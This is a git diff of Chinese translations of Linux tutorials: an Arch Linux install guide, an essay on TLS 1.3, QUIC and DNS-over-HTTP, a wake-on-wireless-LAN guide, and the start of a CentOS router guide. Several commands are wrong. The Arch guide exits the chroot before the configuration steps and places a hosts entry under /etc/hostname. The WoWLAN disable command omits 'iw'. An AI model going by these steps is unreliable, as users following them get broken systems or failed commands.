|
||||
|
||||
我们在这里讨论的安装方法是从你的电脑上**完全删除已有的操作系统** ,而后在其上安装 Arch Linux。如果你想遵循这一教程安装 Arch,请确保你已经备份了所有文件,否则你就会失去它们。切切。
|
||||
|
||||
在你从 USB 上安装 Arch 之前,请确保你已经满足了以下条件:
|
||||
|
||||
#### 安装 Arch Linux 的条件:
|
||||
|
||||
* 一个兼容 x86_64(例如 64 位)的机器
|
||||
* 最小 512M 内存(建议 2GB)
|
||||
* 最少 1GB 的磁盘空余空间(日常使用推荐 20GB)
|
||||
* 可以访问互联网
|
||||
* 至少有 2GB 存储空间的 USB 存储器
|
||||
* 熟悉 Linux 命令行
|
||||
|
||||
一旦你确认满足所有条件,就可以开始安装 Arch Linux 了。
|
||||
|
||||
#### 第一步:下载 ISO 文件
|
||||
|
||||
你可以从[官网][6]上下载 ISO。安装 Arch Linux 需要一个至少有 512M 内存和 800M 磁盘空间,并兼容 x86_64 (如 64 位)的机器。不过,建议至少有 2G 内存和 20G 磁盘空间,这样安装桌面环境时就不会遇到麻烦。
|
||||
|
||||
#### 第二步:创建一个 Arch Linux 的现场版 USB 存储器
|
||||
|
||||
我们需要用你刚刚下载的 ISO 文件创建一个 Arch Linux 的<ruby>现场版<rt>live</rt></ruby> USB 存储器。
|
||||
|
||||
如果你使用 Linux,你可以用 `dd` 命令来创建现场版 USB 存储器。 记得将下面的例子中的 `/path/to/archlinux.iso` 改成你的 ISO 文件的实际存储位置,`/dev/sdx` 改成你的磁盘设备号(例如 `/dev/sdb`)。你可以通过 [lsblk][7] 命令来了解你的设备信息。
|
||||
|
||||
```
|
||||
dd bs=4M if=/path/to/archlinux.iso of=/dev/sdx status=progress && sync
|
||||
```
|
||||
在 Windows 下,有多种方法来创建现场版 USB 存储器。 推荐工具是 Rufus。我们之前已经有[如何使用这一工具创建Antergos 现场版 USB 存储器][8]的教程。因为 Antergos 发行版是基于 Arc h的,所以你可以使用同一教程。
|
||||
|
||||
#### 步骤三:从现场版 USB 存储器上启动
|
||||
|
||||
一旦你已经创建了 Arch Linux 的现场版 USB 存储器,关闭你的电脑。插上你的 USB 存储器然后启动系统。在开机启动时,持续按 F2、F10 或 F1 之类的按键(根据你的电脑型号而定)进入启动设置。在这里,选择“从 USB 存储器或可移除设备启动”这一项。
|
||||
|
||||
一旦你选择了它,你会看到这样一个选项:
|
||||
|
||||
![Arch Linux][9]
|
||||
|
||||
选择“Boot Arch Linux (x86\_64)”。经过各种系统检查后,Arch Linux 会启动到 root 用户的命令行界面。
|
||||
|
||||
接下来的步骤包括磁盘分区、创建文件系统并挂载它。
|
||||
|
||||
#### 第四步:磁盘分区
|
||||
|
||||
第一步就是给你的硬盘分区。单根分区是最简单的,就在它上面创建根分区(`/`)分区、交换分区和 `home` 分区。
|
||||
|
||||
我有一个 19G 的硬盘,我想在这儿安装 Arch Linux。为了创建分区,输入:
|
||||
|
||||
```
|
||||
fdisk /dev/sda
|
||||
```
|
||||
|
||||
按 `n` 创建新分区。按 `p` 创建主分区,然后选择分区号。
|
||||
|
||||
第一个扇区会被自动选择,你只要按回车键。在确定分区的最后一个扇区时,请输入这一分区的大小。
|
||||
|
||||
用相同的方法为 `home` 和交换分区创建两个分区,按 `w` 来保存修改并退出。
|
||||
|
||||
![root partition][10]
|
||||
|
||||
|
||||
#### 第四步:创建文件系统
|
||||
|
||||
因为我们已经有了三个分区,接下来就是创建文件系统来格式化分区。
|
||||
|
||||
我们用 `mkfs` 命令在根分区和 `home` 分区上创建文件系统,用 `mkswap` 创建交换分区。我们用 ext4 文件系统格式化磁盘。
|
||||
|
||||
```
|
||||
mkfs.ext4 /dev/sda1
|
||||
mkfs.ext4 /dev/sda3
|
||||
|
||||
mkswap /dev/sda2
|
||||
swapon /dev/sda2
|
||||
```
|
||||
|
||||
将这些分区挂载在根分区和 `home` 分区下:
|
||||
|
||||
```
|
||||
mount /dev/sda1 /mnt
|
||||
mkdir /mnt/home
|
||||
mount /dev/sda3 /mnt/home
|
||||
```
|
||||
|
||||
#### 第五步:安装
|
||||
|
||||
我们已经创建分区并挂载了分区,开始安装最基本的软件包。基本的软件包包括了系统运行所必需的所有软件包。比如有 GNU BASH shell、文件压缩工具、文件系统管理工具、C 语言库、压缩工具、Linux 内核及其模块,类库、系统工具、USB 设备工具、Vi 文本编辑器等等。
|
||||
|
||||
```
|
||||
pacstrap /mnt base base-devel
|
||||
```
|
||||
|
||||
#### 第六步:配置系统
|
||||
|
||||
生成一个 `fstab` 文件来规定磁盘分区、块设备,或者远程文件系统是如何挂载进文件系统中的。
|
||||
|
||||
```
|
||||
genfstab -U /mnt >> /mnt/etc/fstab
|
||||
```
|
||||
|
||||
进入 chroot 环境,这样可以为当前进程以及子进程切换当前根目录。
|
||||
|
||||
```
|
||||
arch-chroot /mnt
|
||||
```
|
||||
|
||||
一些需要与数据总线保持连接的 systemd 工具不能在 chroot 环境下使用,所以需要从当前环境退出。想要退出 chroot,就用下面的命令:
|
||||
|
||||
```
|
||||
exit
|
||||
```
|
||||
|
||||
#### 第七步:设定时区
|
||||
|
||||
用下面这条命令设定时区:
|
||||
|
||||
```
|
||||
ln -sf /usr/share/<时区信息>/<地区>/<城市> /etc/localtime
|
||||
```
|
||||
|
||||
获取时区列表,输入:
|
||||
|
||||
```
|
||||
ls /usr/share/zoneinfo
|
||||
```
|
||||
|
||||
用 `hwclock` 命令设定硬件时钟:
|
||||
|
||||
```
|
||||
hwclock --systohc --utc
|
||||
```
|
||||
|
||||
#### 第八步:设置地区
|
||||
|
||||
文件 `/etc/locale.gen` 在注释里包含了所有地区和系统语言设置。用 Vi 打开它,然后去掉你希望选择语言前面的注释。 我选择了 `en_GB.UTF-8`。
|
||||
|
||||
现在用下面的命令在 `/etc` 文件夹里生成 关于地区的配置文件:
|
||||
|
||||
```
|
||||
locale-gen
|
||||
echo LANG=en_GB.UTF-8 > /etc/locale.conf
|
||||
export LANG=en_GB.UTF-8
|
||||
```
|
||||
|
||||
#### 第九步 :安装 bootloader,设置主机名和 root 密码
|
||||
|
||||
创建 `/etc/hostname` 文件 然后添加一个对应的主机名:
|
||||
|
||||
```
|
||||
127.0.1.1 myhostname.localdomain myhostname
|
||||
```
|
||||
|
||||
我添加了 `ItsFossArch` 作为我的主机名:
|
||||
|
||||
```
|
||||
echo ItsFossArch > /etc/hostname
|
||||
```
|
||||
|
||||
然后也将它添加到 `/etc/hosts` 中
|
||||
|
||||
为了安装 bootloader 使用下面的命令:
|
||||
|
||||
```
|
||||
pacman -S grub
|
||||
grub-install /dev/sda
|
||||
grub-mkconfig -o /boot/grub/grub.cfg
|
||||
```
|
||||
|
||||
创建 root 密码,输入:
|
||||
|
||||
```
|
||||
passwd
|
||||
```
|
||||
|
||||
输入你想要的密码。
|
||||
|
||||
完成之后,更新你的系统。但很有可能你的系统已经是最新的,因为你下载的是最新的 ISO。
|
||||
|
||||
```
|
||||
pacman -Syu
|
||||
```
|
||||
|
||||
恭喜! 你已经安装了 Arch Linux 的命令行版本。
|
||||
|
||||
接下来,我们会了解到如何为 Arch 设置并安装一个桌面环境。我很喜欢 GNOME 桌面环境,所以在这儿也就选择了这个。
|
||||
|
||||
#### 第十步:安装桌面(这一例子中是 GNOME)
|
||||
|
||||
在你安装桌面之前,你需要先设置网络。
|
||||
|
||||
你可以用下面的命令看见你的端口:
|
||||
|
||||
```
|
||||
ip link
|
||||
```
|
||||
|
||||
![][11]
|
||||
|
||||
在我的电脑上,端口名是 `enp0s3`。
|
||||
|
||||
将下面这一段加进文件中:
|
||||
|
||||
```
|
||||
vi /etc/systemd/network/enp0s3.network
|
||||
|
||||
[Match]
|
||||
name=en*
|
||||
[Network]
|
||||
DHCP=yes
|
||||
```
|
||||
|
||||
保存并退出。重启网络来应用你刚才的改动。
|
||||
|
||||
```
|
||||
systemctl restart systemd-networkd
|
||||
systemctl enable systemd-networkd
|
||||
```
|
||||
|
||||
将下面这两句话加进 `/etc/resolv.conf` 中
|
||||
|
||||
```
|
||||
nameserver 8.8.8.8
|
||||
nameserver 8.8.4.4
|
||||
```
|
||||
|
||||
下一步是安装 X 环境。
|
||||
|
||||
输入下面的命令安装 Xorg,并将它作为显示服务器。
|
||||
|
||||
```
|
||||
pacman -S xorg xorg-server
|
||||
```
|
||||
|
||||
gnome 包含了基本的 GNOME桌面,gnome-extra 则包含 GNOME 应用、归档管理器、磁盘管理器、文本编辑器和其它的应用。
|
||||
|
||||
```
|
||||
pacman -S gnome gnome-extra
|
||||
```
|
||||
|
||||
最后一步是在 Arch 上开启 GDM 显示管理器。
|
||||
|
||||
```
|
||||
systemctl start gdm.service
|
||||
systemctl enable gdm.service
|
||||
```
|
||||
|
||||
重启你的系统,你就会看见 GNOME 的登录界面。
|
||||
|
||||
### Arch Linux 安装总结
|
||||
|
||||
我们在下面的视频中展示了一个由 Foss 读者 Gonzalo Tormo 提供的相似的安装方法(全屏观看,能更好的看清命令):
|
||||
|
||||
![视频](https://youtu.be/iENmRwVhsTQ)
|
||||
|
||||
你也许意识到安装 Arch 不像[安装 Ubuntu][12] 一样简单。不过,只要有耐心,你一定可以安装好它,并且向全世界宣布你在用 Arch Linux。
|
||||
|
||||
Arch Linux 安装过程本身就是一个学习的机会。一旦安装完毕,我建议你参考它的 Wiki 去尝试其它的桌面环境,从而更深入了解这一操作系统。你可以探索它,发现它的强大之处。
|
||||
|
||||
如果你在安装 Arch 的过程中遇到任何问题,请在评论中给我们留言。
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://itsfoss.com/install-arch-linux/
|
||||
|
||||
作者:[Ambarish Kumar][a]
|
||||
译者:[wenwensnow](https://github.com/wenwensnow)
|
||||
校对:[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://itsfoss.com/author/ambarish/
|
||||
[1]:https://www.archlinux.org/
|
||||
[2]:https://en.wikipedia.org/wiki/Do_it_yourself
|
||||
[3]:https://wiki.archlinux.org/index.php/pacman
|
||||
[4]:data:image/gif;base64,R0lGODdhAQABAPAAAP///wAAACwAAAAAAQABAEACAkQBADs=
|
||||
[5]:https://itsfoss.com/wp-content/uploads/2017/12/install-arch-linux-featured-800x450.png
|
||||
[6]:https://www.archlinux.org/download/
|
||||
[7]:https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/deployment_guide/s1-sysinfo-filesystems
|
||||
[8]:https://itsfoss.com/live-usb-antergos/
|
||||
[9]:https://itsfoss.com/wp-content/uploads/2017/11/1-2.jpg
|
||||
[10]:https://itsfoss.com/wp-content/uploads/2017/11/4-root-partition.png
|
||||
[11]:https://itsfoss.com/wp-content/uploads/2017/12/11.png
|
||||
[12]:https://itsfoss.com/install-ubuntu-1404-dual-boot-mode-windows-8-81-uefi/
|
||||
[13]:https://wiki.archlinux.org/
|
@ -41,7 +41,7 @@
|
||||
|
||||
值得注意的是,尽管存在这些变化,HTTP/2 并没有出现明显的互操作性问题或者来自网络的冲突。
|
||||
|
||||
#### TLS 1.3
|
||||
### TLS 1.3
|
||||
|
||||
[TLS 1.3][21] 刚刚通过了标准化的最后流程,并且已经被一些实现所支持。
|
||||
|
||||
@ -57,75 +57,75 @@ TLS 1.3 并不支持那些窃听通讯的特定技术,因为那也是 [一种
|
||||
|
||||
在这一点上,TLS 1.3 看起来不会去改变以适应这些网络,但是,关于去创建另外一种协议有一些传言,这种协议允许第三方去偷窥通讯内容,或者做更多的事情。这件事是否会得到推动还有待观察。
|
||||
|
||||
#### QUIC
|
||||
### QUIC
|
||||
|
||||
在 HTTP/2 工作期间,可以很明显地看到 TCP 是很低效率的。因为 TCP 是一个按顺序发送的协议,丢失的包阻止了在缓存中的后面等待的包被发送到应用程序。对于一个多路协议来说,这对性能有很大的影响。
|
||||
在 HTTP/2 工作中,可以很明显地看到 TCP 有相似的低效率。因为 TCP 是一个按顺序发送的协议,一个数据包的丢失可能阻止其后面缓存区中的数据包被发送到应用程序。对于一个多路复用协议来说,这对性能有很大的影响。
|
||||
|
||||
[QUIC][23] 是尝试去解决这种影响而在 UDP 之上重构的 TCP 语义(属于 HTTP/2 的流模型的一部分)像 HTTP/2 一样,它作为 Google 的一项成果被发起,并且现在已经进入了 IETF,它最初是作为一个 HTTP-over-UDP 的使用案例,并且它的目标是在 2018 年成为一个标准。但是,因为 Google 在 Chrome 浏览器和它的网站上中已经部署了 QUIC,它已经占有了互联网通讯超过 7% 的份额。
|
||||
[QUIC][23] 尝试去解决这种影响而在 UDP 之上重构了 TCP 语义(以及 HTTP/2 流模型的一部分)。像 HTTP/2 一样,它始于 Google 的一项成果,并且现在已经被 IETF 接纳作为一个 HTTP-over-UDP 的初始用例,其目标是在 2018 年底成为一个标准。然而,因为 Google 已经在 Chrome 浏览器及其网站上部署了 QUIC,它已经占有了超过 7% 的互联网通讯份额。
|
||||
|
||||
阅读 [关于 QUIC 的答疑][24]
|
||||
- 阅读 [关于 QUIC 的答疑][24]
|
||||
|
||||
除了大量的通讯(以及隐含的可能的网络调整)从 TCP 到 UDP 的转变之外,Google QUIC(gQUIC)和 IETF QUIC(iQUIC)都要求完全加密;这里没有非加密的 QUIC。
|
||||
除了大量的通讯从 TCP 到 UDP 的转变(以及隐含的可能的网络调整)之外,Google QUIC(gQUIC)和 IETF QUIC(iQUIC)都要求全程加密;并没有非加密的 QUIC。
|
||||
|
||||
iQUIC 使用 TLS 1.3 去为一个会话创建一个密码,然后使用它去加密每个包。然而,因为,它是基于 UDP 的,在 QUIC 中许多会话信息和元数据在加密后的 TCP 包中被公开。
|
||||
iQUIC 使用 TLS 1.3 来为会话建立密钥,然后使用它去加密每个数据包。然而,由于它是基于 UDP 的,许多 TCP 中公开的会话信息和元数据在 QUIC 中被加密了。
|
||||
|
||||
事实上,iQUIC 当前的 [‘短报文头’][25] — 被用于除了握手外的所有包 — 仅公开一个包编号、一个可选的连接标识符、和一个状态字节,像加密密钥转换计划和包字节(它最终也可能被加密)。
|
||||
事实上,iQUIC 当前的 [‘短报文头’][25] 被用于除了握手外的所有包,仅公开一个包编号、一个可选的连接标识符和一个状态字节,像加密密钥轮换计划和包字节(它最终也可能被加密)。
|
||||
|
||||
其它的所有东西都被加密 — 包括 ACKs,以提高 [通讯分析][26] 攻击的门槛。
|
||||
其它的所有东西都被加密 —— 包括 ACK,以提高 [通讯分析][26] 攻击的门槛。
|
||||
|
||||
然而,这意味着被动估算 RTT 和通过观察连接的丢失包将不再变得可能;因为这里没有足够多的信息了。在一些运营商中,由于缺乏可观测性,导致了大量的担忧,它们认为像这样的被动测量对于他们调试和了解它们的网络是至关重要的。
|
||||
然而,这意味着通过观察连接来被动估算 RTT 和包丢失率将不再变得可行;因为没有足够多的信息。在一些运营商中,由于缺乏可观测性,导致了大量的担忧,它们认为像这样的被动测量对于他们调试和了解它们的网络是至关重要的。
|
||||
|
||||
为满足这一需求,它们有一个提议是 ‘[Spin Bit][27]‘ — 在报文头中的一个 bit,它是一个往返的开关,因此,可能通过观察它来估算 RTT。因为,它从应用程序的状态中解耦的,它的出现并不会泄露关于终端的任何信息,也无法实现对网络位置的粗略估计。
|
||||
为满足这一需求,它们有一个提议是 ‘[Spin Bit][27]’ — 这是在报文头中的一个回程翻转的位,因此,可能通过观察它来估算 RTT。因为,它从应用程序的状态中解耦的,它的出现并不会泄露关于终端的任何信息,也无法实现对网络位置的粗略估计。
|
||||
|
||||
#### DOH
|
||||
### DOH
|
||||
|
||||
可以肯定的即将发生的变化是 DOH — [DNS over HTTP][28]。[大量的研究表明,对网络实施策略的一个常用手段是通过 DNS 实现的][29](是否代表网络运营商或者一个更大的权威)。
|
||||
即将发生的变化是 DOH — [DNS over HTTP][28]。[大量的研究表明,对网络实施政策干预的一个常用手段是通过 DNS 实现的][29](无论是代表网络运营商或者一个更大的权力机构)。
|
||||
|
||||
使用加密去规避这种控制已经 [讨论了一段时间了][30],但是,它有一个不利条件(至少从某些立场来看)— 它可能从其它的通讯中被区别对待;例如,通过利用它的端口号被阻止访问。
|
||||
使用加密去规避这种控制已经 [讨论了一段时间了][30],但是,它有一个不利条件(至少从某些立场来看)— 它可能与其它通讯区别对待;例如,通过它的端口号被阻止访问。
|
||||
|
||||
DOH 将 DNS 通讯稍带在已经建立的 HTTP 连接上,因此,消除了任何的鉴别器。一个网络希望去阻止访问,仅需要去阻止 DNS 解析就可以做到阻止对特定网站的访问。
|
||||
DOH 将 DNS 通讯搭载在已经建立的 HTTP 连接上,因此,消除了任何的鉴别器。希望阻止访问该 DNS 解析器的网络只能通过阻止对该网站的访问来实现。
|
||||
|
||||
例如,如果 Google 在 <tt style="box-sizing: inherit;">www.google.com</tt> 上部署了它的 [基于 DOH 的公共 DNS 服务][31] 并且一个用户配置了它的浏览器去使用它,一个希望(或被要求的)被停止的网络,它将被 Google 有效的全部阻止(向他们提供的服务致敬!)。
|
||||
例如,如果 Google 在 www.google.com 上部署了它的 [基于 DOH 的公共 DNS 服务][31],并且一个用户配置了它的浏览器去使用它,一个希望(或被要求的)被停止访问该服务的网络,将必须阻止对 Google 的全部访问(向他们提供的服务致敬!)(LCTT 译注:他们做到了)。
|
||||
|
||||
DOH 才刚刚开始,但它已经引起很多人的兴趣和一些部署的声音。通过使用 DNS 来实施策略的网络(和政府机构)如何反应还有待观察。
|
||||
DOH 才刚刚开始,但它已经引起很多人的兴趣,并有了一些部署的传闻。通过使用 DNS 来实施政策影响的网络(和政府机构)如何反应还有待观察。
|
||||
|
||||
阅读 [IETF 100, Singapore: DNS over HTTP (DOH!)][1]
|
||||
|
||||
#### 骨化和润滑
|
||||
### 僵化和润滑
|
||||
|
||||
让我们返回到协议变化的动机,其中一个主题是吞吐量,协议设计者们遇到的越来越多的问题是怎么去假设关于通讯的问题。
|
||||
让我们返回到协议变化的动机,有一个主题贯穿了这项工作,协议设计者们遇到的越来越多的问题是网络对流量的使用做了假设。
|
||||
|
||||
例如,TLS 1.3 有一个使用旧版本协议的中间设备的最后结束时间的问题。gQUIC 黑名单控制网络的 UDP 通讯,因为,它们认为那是有害的或者是低优先级的通讯。
|
||||
例如,TLS 1.3 有一些临门一脚的问题是中间设备假设它是旧版本的协议。gQUIC 将几个对 UDP 通讯进行限流的网络列入了黑名单,因为,那些网络认为 UDP 通讯是有害的或者是低优先级的。
|
||||
|
||||
当一个协议因为已部署而 “冻结” 它的可扩展点导致不能被进化,我们称它为 _已骨化_ 。TCP 协议自身就是一个严重骨化的例子,因此,很中间设备在 TCP 上做了很多的事情 — 是否阻止有无法识别的 TCP 选项的数据包,或者,优化拥塞控制。
|
||||
当一个协议因为已有的部署而 “冻结” 它的可扩展点,从而导致不能再进化,我们称它为 _已经僵化了_ 。TCP 协议自身就是一个严重僵化的例子,因此,太多的中间设备在 TCP 协议上做了太多的事情,比如阻止了带有无法识别的 TCP 选项的数据包,或者,“优化”了拥塞控制。
|
||||
|
||||
有必要去阻止骨化,去确保协议可以被进化,以满足未来互联网的需要;否则,它将成为一个 ”公共的悲剧“,它只能是满足一些个别的网络行为的地方 — 虽然很好 — 但是将影响整个互联网的健康发展。
|
||||
防止僵化是有必要的,确保协议可以进化以满足未来互联网的需要;否则,它将成为一个“公共灾难”,一些个别网络的行为 —— 虽然在那里工作的很好 —— 但将影响整个互联网的健康发展。
|
||||
|
||||
这里有很多的方式去阻止骨化;如果被讨论的数据是加密的,它并不能被任何一方所访问,但是持有密钥的人,阻止了干扰。如果扩展点是未加密的,但是在一种可以打破应用程序可见性(例如,HTTP 报头)的方法被常规使用后,它不太可能会受到干扰。
|
||||
有很多的方式去防止僵化;如果被讨论的数据是加密的,它并不能被除了持有密钥的人之外任何一方所访问,阻止了干扰。如果扩展点是未加密的,但是通常以一种可以明显中断应用程序的方法使用(例如,HTTP 报头),它不太可能受到干扰。
|
||||
|
||||
协议设计者不能使用加密的地方和一个不经常使用的扩展点、人为发挥的可利用的扩展点;我们称之为 _润滑_ 它。
|
||||
协议设计者不能使用加密的扩展点不经常使用的情况下,人为地利用扩展点——我们称之为 _润滑_ 它。
|
||||
|
||||
例如,QUIC 鼓励终端在 [版本协商][32] 中使用一系列的诱饵值,去避免它永远不变化的假定实现(就像在 TLS 实现中经常遇到的导致重大问题的情况)。
|
||||
例如,QUIC 鼓励终端在 [版本协商][32] 中使用一系列的诱饵值,来避免假设它的实现永远不变化(就像在 TLS 实现中经常遇到的导致重大问题的情况)。
|
||||
|
||||
#### 网络和用户
|
||||
### 网络和用户
|
||||
|
||||
除了避免骨化的愿望外,这些变化也反映出了网络和它们的用户之间的进化。很长时间以来,人们总是假设网络总是很仁慈好善的 — 或者至少是公正的 — 这种情况是不存在的,不仅是 [无孔不入的监视][33],也有像 [Firesheep][34] 的攻击。
|
||||
除了避免僵化的愿望外,这些变化也反映出了网络和它们的用户之间关系的进化。很长时间以来,人们总是假设网络总是很仁慈好善的 —— 或者至少是公正的 —— 但这种情况是不存在的,不仅是 [无孔不入的监视][33],也有像 [Firesheep][34] 的攻击。
|
||||
|
||||
因此,互联网用户的整体需求和那些想去访问流经它们的网络的用户数据的网络之间的关系日益紧张。尤其受影响的是那些希望去对它们的用户实施策略的网络;例如,企业网络。
|
||||
因此,当那些网络想去访问一些流经它们的网络的用户数据时,互联网用户的整体需求和那些网络之间的关系日益紧张。尤其受影响的是那些希望去对它们的用户实施政策干预的网络;例如,企业网络。
|
||||
|
||||
在一些情况中,他们可以通过在它们的用户机器上安装软件(或一个 CA 证书,或者一个浏览器扩展)来达到他们的目的。然而,在网络不是所有者或者能够访问计算机的情况下,这并不容易;例如,BYOD 已经很常用,并且物联网设备几乎没有合适的控制接口。
|
||||
在一些情况中,他们可以通过在它们的用户机器上安装软件(或一个 CA 证书,或者一个浏览器扩展)来达到他们的目的。然而,在网络不拥有或无法访问计算机的情况下,这并不容易;例如,BYOD 已经很常用,并且物联网设备几乎没有合适的控制接口。
|
||||
|
||||
因此,在 IETF 中围绕协议开发的许多讨论,是去接触企业和其它的 ”叶子“ 网络之间偶尔的需求竞争,并且这对互联网的整体是有好处的。
|
||||
因此,在 IETF 中围绕协议开发的许多讨论,触及了企业和其它的 “叶子” 网络有时相互竞争的需求,以及互联网整体的好处。
|
||||
|
||||
#### 参与
|
||||
### 参与
|
||||
|
||||
为了让互联网在以后工作的更好,它需要为终端用户提供价值、避免骨化、并且允许网络去控制。现在发生的变化需要去满足所有的三个目标,但是,我们需要网络运营商更多的投入。
|
||||
为了让互联网在以后工作的更好,它需要为终端用户提供价值、避免僵化、让网络有序运行。现在正在发生的变化需要满足所有的三个目标,但是,人们需要网络运营商更多的投入。
|
||||
|
||||
如果这些变化影响你的网络 — 或者没有影响 — 请在下面留下评论,或者更好用了,通过参加会议、加入邮件列表、或者对草案提供反馈来参与 [IETF][35] 的工作。
|
||||
如果这些变化影响你的网络 —— 或者没有影响 —— 请在下面留下评论。更好地可以通过参加会议、加入邮件列表、或者对草案提供反馈来参与 [IETF][35] 的工作。
|
||||
|
||||
感谢 Martin Thomson 和 Brian Trammell 的评论。
|
||||
|
||||
_Mark Nottingham 是互联网架构委员会的成员和 IETF 的 HTTP 和 QUIC 工作组的共同主持人。_
|
||||
_本文作者 Mark Nottingham 是互联网架构委员会的成员和 IETF 的 HTTP 和 QUIC 工作组的联席主席。_
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
@ -133,7 +133,7 @@ via: https://blog.apnic.net/2017/12/12/internet-protocols-changing/
|
||||
|
||||
作者:[Mark Nottingham][a]
|
||||
译者:[qhwdw](https://github.com/qhwdw)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
校对:[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
@ -0,0 +1,149 @@
|
||||
如何为 Linux 无线网卡配置无线唤醒功能
|
||||
======
|
||||
|
||||
我有一台用于备份我的所有设备的网络存储(NAS)服务器。然而当我备份我的 Linux 笔记本时遇到了困难。当它休眠或挂起时我不能备份它。当我使用基于 Intel 的无线网卡时,我可以配置笔记本上的 WiFi 接受无线唤醒吗?
|
||||
|
||||
<ruby>[网络唤醒][2]<rt>Wake-on-LAN</rt></ruby>(WOL)是一个以太网标准,它允许服务器通过一个网络消息而被打开。你需要发送一个“魔法数据包”到支持网络唤醒的以太网卡和主板,以便打开被唤醒的系统。
|
||||
|
||||
[![linux-configire-wake-on-wireless-lan-wowlan][1]][1]
|
||||
|
||||
<ruby>无线唤醒<rt>wireless wake-on-lan</rt></ruby>(WoWLAN 或 WoW)允许 Linux 系统进入低耗电模式的情况下保持无线网卡处于激活状态,依然与热点连接。这篇教程演示了如何在一台安装无线网卡的 Linux 笔记本或桌面电脑上启用 WoWLAN / WoW 模式。
|
||||
|
||||
> 请注意,不是所有的无线网卡和 Linux 驱动程序都支持 WoWLAN。
|
||||
|
||||
### 语法
|
||||
|
||||
在 Linux 系统上,你需要使用 `iw` 命令来查看和操作无线设备及其配置。 其格式为:
|
||||
|
||||
```
|
||||
iw command
|
||||
iw [options] command
|
||||
```
|
||||
|
||||
### 列出所有的无线设备及其功能
|
||||
|
||||
输入下面命令:
|
||||
|
||||
```
|
||||
$ iw list
|
||||
$ iw list | more
|
||||
$ iw dev
|
||||
```
|
||||
|
||||
输出为:
|
||||
|
||||
```
|
||||
phy#0
|
||||
Interface wlp3s0
|
||||
ifindex 3
|
||||
wdev 0x1
|
||||
addr 6c:88:14:ff:36:d0
|
||||
type managed
|
||||
channel 149 (5745 MHz),width: 40 MHz, center1: 5755 MHz
|
||||
txpower 15.00 dBm
|
||||
```
|
||||
|
||||
请记下这个 `phy0`。
|
||||
|
||||
### 查看无线唤醒的当前状态
|
||||
|
||||
打开终端并输入下面命令来查看无线网络的状态:
|
||||
|
||||
```
|
||||
$ iw phy0 wowlan show
|
||||
```
|
||||
|
||||
输出为:
|
||||
|
||||
```
|
||||
WoWLAN is disabled
|
||||
```
|
||||
|
||||
### 如何启用无线唤醒
|
||||
|
||||
启用的语法为:
|
||||
|
||||
`sudo iw phy {phyname} wowlan enable {option}`
|
||||
|
||||
其中,
|
||||
|
||||
1. `{phyname}` - 使用 `iw dev` 来获取其物理名。
|
||||
2. `{option}` - 可以是 `any`、`disconnect`、`magic-packet` 等。
|
||||
|
||||
比如,我想为 `phy0` 开启无线唤醒:
|
||||
|
||||
```
|
||||
$ sudo iw phy0 wowlan enable any
|
||||
```
|
||||
或者:
|
||||
|
||||
```
|
||||
$ sudo iw phy0 wowlan enable magic-packet disconnect
|
||||
```
|
||||
|
||||
检查一下:
|
||||
|
||||
```
|
||||
$ iw phy0 wowlan show
|
||||
```
|
||||
|
||||
结果为:
|
||||
|
||||
```
|
||||
WoWLAN is enabled:
|
||||
* wake up on disconnect
|
||||
* wake up on magic packet
|
||||
```
|
||||
|
||||
### 测试一下
|
||||
|
||||
将你的笔记本挂起或者进入休眠模式:
|
||||
|
||||
```
|
||||
$ sudo sh -c 'echo mem > /sys/power/state'
|
||||
```
|
||||
|
||||
从 NAS 服务器上使用 [ping 命令][3] 发送 ping 请求
|
||||
|
||||
```
|
||||
$ ping your-laptop-ip
|
||||
```
|
||||
|
||||
也可以 [使用 `wakeonlan` 命令发送魔法数据包][4]:
|
||||
|
||||
```
|
||||
$ wakeonlan laptop-mac-address-here
|
||||
$ etherwake MAC-Address-Here
|
||||
```
|
||||
|
||||
### 如何禁用无线唤醒?
|
||||
|
||||
语法为:
|
||||
|
||||
```
|
||||
$ sudo phy {phyname} wowlan disable
|
||||
$ sudo phy0 wowlan disable
|
||||
```
|
||||
|
||||
更多信息请阅读 `iw` 命令的 man 页:
|
||||
|
||||
```
|
||||
$ man iw
|
||||
$ iw --help
|
||||
```
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.cyberciti.biz/faq/configure-wireless-wake-on-lan-for-linux-wifi-wowlan-card/
|
||||
|
||||
作者:[Vivek Gite][a]
|
||||
译者:[lujun9972](https://github.com/lujun9972)
|
||||
校对:[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://twitter.com/nixcraft
|
||||
[1]: https://www.cyberciti.biz/media/new/faq/2017/12/linux-configire-wake-on-wireless-lan-wowlan.jpg
|
||||
[2]: https://www.cyberciti.biz/tips/linux-send-wake-on-lan-wol-magic-packets.html
|
||||
[3]: https://www.cyberciti.biz/faq/unix-ping-command-examples/ (See Linux/Unix ping command examples for more info)
|
||||
[4]: https://www.cyberciti.biz/faq/apple-os-x-wake-on-lancommand-line-utility/
|
@ -0,0 +1,92 @@
|
||||
将安装了 CentOS/RHEL 6/7 的机器转变成路由器
|
||||
======
|
||||
|
||||
在本文中,我们将学习通过使用 NAT 技术将安装有 RHEL/CentOS 6 & 7 的机器转变成路由器来用。 我们都知道,路由器是一个工作在第三层的网络设备,用于将两个或多个网络连接在一起,即,将局域网连接上广域网上或者局域网直接互联。 路由器非常昂贵,尤其对于小型组织来说更是如此,这可能是我们关注路由器的一个原因。 与其使用专用硬件,不如让我们用 Linux 机器转换成路由器来用。
|
||||
|
||||
RHEL/CentOS 6 和 7 上的操作过程我们都会讲。但在开始之前, 让我们先看看需要准备那些东西。
|
||||
|
||||
### 前期条件
|
||||
|
||||
1、 一台装有 RHEL/CentOS 6 或 7 的机器
|
||||
|
||||
2、两块分别配有本地 IP 和外网 IP 的网卡
|
||||
|
||||
